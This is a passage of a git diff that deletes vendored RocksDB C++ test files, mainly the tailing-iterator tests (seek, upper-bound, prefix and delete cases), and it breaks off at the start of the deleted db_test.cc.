-    ASSERT_EQ(1U, fname_to_props.size());
-
-    std::string expected_cf_name;
-    if (cf > 0) {
-      expected_cf_name = kExtraCfName;
-    } else {
-      expected_cf_name = kDefaultColumnFamilyName;
-    }
-    ASSERT_EQ(expected_cf_name,
-              fname_to_props.begin()->second->column_family_name);
-    ASSERT_EQ(cf, static_cast<uint32_t>(
-                      fname_to_props.begin()->second->column_family_id));
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_tailing_iter_test.cc b/thirdparty/rocksdb/db/db_tailing_iter_test.cc
deleted file mode 100644
index d217828..0000000
--- a/thirdparty/rocksdb/db/db_tailing_iter_test.cc
+++ /dev/null
@@ -1,814 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestTailingIterator : public DBTestBase {
- public:
-  DBTestTailingIterator() : DBTestBase("/db_tailing_iterator_test") {}
-};
-
-TEST_F(DBTestTailingIterator, TailingIteratorSingle) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  ASSERT_TRUE(!iter->Valid());
-
-  // add a record and check that iter can see it
-  ASSERT_OK(db_->Put(WriteOptions(), "mirko", "fodor"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "mirko");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorKeepAdding) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 10000;
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "%016d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorSeekToNext) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> itern(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-    if (i == 1) {
-      itern->SeekToFirst();
-    } else {
-      itern->Next();
-    }
-    ASSERT_TRUE(itern->Valid());
-    ASSERT_EQ(itern->key().compare(key), 0);
-  }
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) {
-  const uint64_t k150KB = 150 * 1024;
-  Options options;
-  options.write_buffer_size = k150KB;
-  options.max_write_buffer_number = 3;
-  options.min_write_buffer_number_to_merge = 2;
-  options.env = env_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ReadOptions read_options;
-  read_options.tailing = true;
-  int num_iters, deleted_iters;
-
-  char bufe[32];
-  snprintf(bufe, sizeof(bufe), "00b0%016d", 0);
-  Slice keyu(bufe, 20);
-  read_options.iterate_upper_bound = &keyu;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> itern(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> iterh(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-  bool file_iters_deleted = false;
-  bool file_iters_renewed_null = false;
-  bool file_iters_renewed_copy = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::SeekInternal:Return", [&](void* arg) {
-        ForwardIterator* fiter = reinterpret_cast<ForwardIterator*>(arg);
-        ASSERT_TRUE(!file_iters_deleted ||
-                    fiter->TEST_CheckDeletedIters(&deleted_iters, &num_iters));
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::Next:Return", [&](void* arg) {
-        ForwardIterator* fiter = reinterpret_cast<ForwardIterator*>(arg);
-        ASSERT_TRUE(!file_iters_deleted ||
-                    fiter->TEST_CheckDeletedIters(&deleted_iters, &num_iters));
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::RenewIterators:Null",
-      [&](void* arg) { file_iters_renewed_null = true; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::RenewIterators:Copy",
-      [&](void* arg) { file_iters_renewed_copy = true; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
-    char buf1[32];
-    char buf2[32];
-    char buf3[32];
-    char buf4[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-    snprintf(buf3, sizeof(buf3), "00b0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-    Slice keyn(buf3, 20);
-    ASSERT_OK(Put(1, keyn, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-      dbfull()->TEST_WaitForCompact();
-      if (i == 299) {
-        file_iters_deleted = true;
-      }
-      snprintf(buf4, sizeof(buf4), "00a0%016d", i * 5 / 2);
-      Slice target(buf4, 20);
-      iterh->Seek(target);
-      ASSERT_TRUE(iter->Valid());
-      for (int j = (i + 1) * 5 / 2; j < i * 5; j += 5) {
-        iterh->Next();
-        ASSERT_TRUE(iterh->Valid());
-      }
-      if (i == 299) {
-        file_iters_deleted = false;
-      }
-    }
-
-    file_iters_deleted = true;
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-    ASSERT_LE(num_iters, 1);
-    if (i == 1) {
-      itern->SeekToFirst();
-    } else {
-      itern->Next();
-    }
-    ASSERT_TRUE(itern->Valid());
-    ASSERT_EQ(itern->key().compare(key), 0);
-    ASSERT_LE(num_iters, 1);
-    file_iters_deleted = false;
-  }
-  ASSERT_TRUE(file_iters_renewed_null);
-  ASSERT_TRUE(file_iters_renewed_copy);
-  iter = 0;
-  itern = 0;
-  iterh = 0;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  table_options.block_cache_compressed = nullptr;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  read_options.read_tier = kBlockCacheTier;
-  std::unique_ptr<Iterator> iteri(db_->NewIterator(read_options, handles_[1]));
-  char buf5[32];
-  snprintf(buf5, sizeof(buf5), "00a0%016d", (num_records / 2) * 5 - 2);
-  Slice target1(buf5, 20);
-  iteri->Seek(target1);
-  ASSERT_TRUE(iteri->status().IsIncomplete());
-  iteri = 0;
-
-  read_options.read_tier = kReadAllTier;
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  iter.reset(db_->NewIterator(read_options, handles_[1]));
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorDeletes) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-
-  // write a single record, read it using the iterator, then delete it
-  ASSERT_OK(Put(1, "0test", "test"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0test");
-  ASSERT_OK(Delete(1, "0test"));
-
-  // write many more records
-  const int num_records = 10000;
-  std::string value(1024, 'A');
-
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "1%015d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-  }
-
-  // force a flush to make sure that no records are read from memtable
-  ASSERT_OK(Flush(1));
-
-  // skip "0test"
-  iter->Next();
-
-  // make sure we can read all new records using the existing iterator
-  int count = 0;
-  for (; iter->Valid(); iter->Next(), ++count) ;
-
-  ASSERT_EQ(count, num_records);
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorPrefixSeek) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(2));
-  options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-  options.allow_concurrent_memtable_write = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  ASSERT_OK(Put(1, "0101", "test"));
-
-  ASSERT_OK(Flush(1));
-
-  ASSERT_OK(Put(1, "0202", "test"));
-
-  // Seek(0102) shouldn't find any records since 0202 has a different prefix
-  iter->Seek("0102");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("0202");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0202");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorIncomplete) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.read_tier = kBlockCacheTier;
-
-  std::string key("key");
-  std::string value("value");
-
-  ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  // we either see the entry or it's not in cache
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  iter->SeekToFirst();
-  // should still be true after compaction
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorSeekToSame) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 1000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  const int NROWS = 10000;
-  // Write rows with keys 00000, 00002, 00004 etc.
-  for (int i = 0; i < NROWS; ++i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%05d", 2*i);
-    std::string key(buf);
-    std::string value("value");
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-  }
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  // Seek to 00001.  We expect to find 00002.
-  std::string start_key = "00001";
-  iter->Seek(start_key);
-  ASSERT_TRUE(iter->Valid());
-
-  std::string found = iter->key().ToString();
-  ASSERT_EQ("00002", found);
-
-  // Now seek to the same key.  The iterator should remain in the same
-  // position.
-  iter->Seek(found);
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(found, iter->key().ToString());
-}
-
-// Sets iterate_upper_bound and verifies that ForwardIterator doesn't call
-// Seek() on immutable iterators when target key is >= prev_key and all
-// iterators, including the memtable iterator, are over the upper bound.
-TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-
-  const Slice upper_bound("20", 3);
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.iterate_upper_bound = &upper_bound;
-
-  ASSERT_OK(Put(1, "11", "11"));
-  ASSERT_OK(Put(1, "12", "12"));
-  ASSERT_OK(Put(1, "22", "22"));
-  ASSERT_OK(Flush(1));  // flush all those keys to an immutable SST file
-
-  // Add another key to the memtable.
-  ASSERT_OK(Put(1, "21", "21"));
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(read_options, handles_[1]));
-  it->Seek("12");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("12", it->key().ToString());
-
-  it->Next();
-  // Not valid since "21" is over the upper bound.
-  ASSERT_FALSE(it->Valid());
-
-  // This keeps track of the number of times NeedToSeekImmutable() was true.
-  int immutable_seeks = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::SeekInternal:Immutable",
-      [&](void* arg) { ++immutable_seeks; });
-
-  // Seek to 13. This should not require any immutable seeks.
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  it->Seek("13");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ASSERT_FALSE(it->Valid());
-  ASSERT_EQ(0, immutable_seeks);
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorGap) {
-  // level 1:            [20, 25]  [35, 40]
-  // level 2:  [10 - 15]                    [45 - 50]
-  // level 3:            [20,    30,    40]
-  // Previously there is a bug in tailing_iterator that if there is a gap in
-  // lower level, the key will be skipped if it is within the range between
-  // the largest key of index n file and the smallest key of index n+1 file
-  // if both file fit in that gap. In this example, 25 < key < 35
-  // https://github.com/facebook/rocksdb/issues/1372
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  ASSERT_OK(Put(1, "20", "20"));
-  ASSERT_OK(Put(1, "30", "30"));
-  ASSERT_OK(Put(1, "40", "40"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(3, 1);
-
-  ASSERT_OK(Put(1, "10", "10"));
-  ASSERT_OK(Put(1, "15", "15"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "45", "45"));
-  ASSERT_OK(Put(1, "50", "50"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(2, 1);
-
-  ASSERT_OK(Put(1, "20", "20"));
-  ASSERT_OK(Put(1, "25", "25"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "35", "35"));
-  ASSERT_OK(Put(1, "40", "40"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(1, 1);
-
-  ColumnFamilyMetaData meta;
-  db_->GetColumnFamilyMetaData(handles_[1], &meta);
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(read_options, handles_[1]));
-  it->Seek("30");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("30", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("35", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("40", it->key().ToString());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSingle) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  ASSERT_TRUE(!iter->Valid());
-
-  // add a record and check that iter can see it
-  ASSERT_OK(db_->Put(WriteOptions(), "mirko", "fodor"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "mirko");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorKeepAdding) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 10000;
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "%016d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSeekToNext) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorDeletes) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-
-  // write a single record, read it using the iterator, then delete it
-  ASSERT_OK(Put(1, "0test", "test"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0test");
-  ASSERT_OK(Delete(1, "0test"));
-
-  // write many more records
-  const int num_records = 10000;
-  std::string value(1024, 'A');
-
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "1%015d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-  }
-
-  // force a flush to make sure that no records are read from memtable
-  ASSERT_OK(Flush(1));
-
-  // skip "0test"
-  iter->Next();
-
-  // make sure we can read all new records using the existing iterator
-  int count = 0;
-  for (; iter->Valid(); iter->Next(), ++count) {
-  }
-
-  ASSERT_EQ(count, num_records);
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorPrefixSeek) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(2));
-  options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-  options.allow_concurrent_memtable_write = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  ASSERT_OK(Put(1, "0101", "test"));
-
-  ASSERT_OK(Flush(1));
-
-  ASSERT_OK(Put(1, "0202", "test"));
-
-  // Seek(0102) shouldn't find any records since 0202 has a different prefix
-  iter->Seek("0102");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("0202");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0202");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorIncomplete) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-  read_options.read_tier = kBlockCacheTier;
-
-  std::string key = "key";
-  std::string value = "value";
-
-  ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  // we either see the entry or it's not in cache
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  iter->SeekToFirst();
-  // should still be true after compaction
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSeekToSame) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 1000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  const int NROWS = 10000;
-  // Write rows with keys 00000, 00002, 00004 etc.
-  for (int i = 0; i < NROWS; ++i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%05d", 2 * i);
-    std::string key(buf);
-    std::string value("value");
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-  }
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  // Seek to 00001.  We expect to find 00002.
-  std::string start_key = "00001";
-  iter->Seek(start_key);
-  ASSERT_TRUE(iter->Valid());
-
-  std::string found = iter->key().ToString();
-  ASSERT_EQ("00002", found);
-
-  // Now seek to the same key.  The iterator should remain in the same
-  // position.
-  iter->Seek(found);
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(found, iter->key().ToString());
-}
-
-TEST_F(DBTestTailingIterator, ForwardIteratorVersionProperty) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 1000;
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  Put("foo", "bar");
-
-  uint64_t v1, v2, v3, v4;
-  {
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->Seek("foo");
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v1 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    Put("foo1", "bar1");
-    Flush();
-
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v2 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    iter->Seek("f");
-
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v3 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    ASSERT_EQ(v1, v2);
-    ASSERT_GT(v3, v2);
-  }
-
-  {
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->Seek("foo");
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v4 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-  }
-  ASSERT_EQ(v3, v4);
-}
-
-TEST_F(DBTestTailingIterator, SeekWithUpperBoundBug) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  const Slice upper_bound("cc", 3);
-  read_options.iterate_upper_bound = &upper_bound;
-
-
-  // 1st L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "aa", "SEEN"));
-  ASSERT_OK(Flush());
-
-  // 2nd L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "zz", "NOT-SEEN"));
-  ASSERT_OK(Flush());
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-
-  iter->Seek("aa");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-}
-
-TEST_F(DBTestTailingIterator, SeekToFirstWithUpperBoundBug) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  const Slice upper_bound("cc", 3);
-  read_options.iterate_upper_bound = &upper_bound;
-
-
-  // 1st L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "aa", "SEEN"));
-  ASSERT_OK(Flush());
-
-  // 2nd L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "zz", "NOT-SEEN"));
-  ASSERT_OK(Flush());
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-}
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_test.cc b/thirdparty/rocksdb/db/db_test.cc
deleted file mode 100644
index 193101d..0000000
--- a/thirdparty/rocksdb/db/db_test.cc
+++ /dev/null
@@ -1,5498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#include <fcntl.h>
-#include <algorithm>
-#include <set>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#ifdef OS_SOLARIS
-#include <alloca.h>
-#endif
-
-#include "cache/lru_cache.h"
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class DBTest : public DBTestBase {
- public:
-  DBTest() : DBTestBase("/db_test") {}
-};
-
-class DBTestWithParam
-    : public DBTest,
